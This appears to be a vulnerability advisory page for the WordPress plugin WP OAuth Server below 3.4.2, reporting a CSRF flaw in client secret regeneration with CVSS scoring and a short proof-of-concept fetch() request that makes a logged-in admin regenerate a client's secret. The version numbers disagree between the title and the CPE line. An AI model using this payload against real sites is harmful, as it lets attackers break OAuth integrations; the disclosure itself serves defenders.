Lucene search

K
wpvulndbLana CodesWPVDB-ID:E1FCDE2A-91A5-40CB-876B-884F01C80336
HistoryNov 10, 2022 - 12:00 a.m.

WP OAuth Server < 3.4.2 - Client Secret Regeneration via CSRF

2022-11-1000:00:00
Lana Codes
wpscan.com
5

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

The plugin does not have CSRF check when regenerating secrets, which could allow attackers to make logged in admins regenerate the secret of an arbitrary client given they know the client ID

PoC

Make a logged in admin open a page containing the HTML code below. This will regenerate the secret for the client with ID KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7 fetch(β€˜https://example.com/wp-admin/admin-ajax.php’, { method: β€˜POST’, headers: new Headers({ β€˜Content-Type’: β€˜application/x-www-form-urlencoded’, }), body: β€˜action=wo_regenerate_secret&data;=KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7’, redirect: β€˜follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(β€˜error’, error));

CPENameOperatorVersion
oauth2-providerlt4.2.2

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Related for WPVDB-ID:E1FCDE2A-91A5-40CB-876B-884F01C80336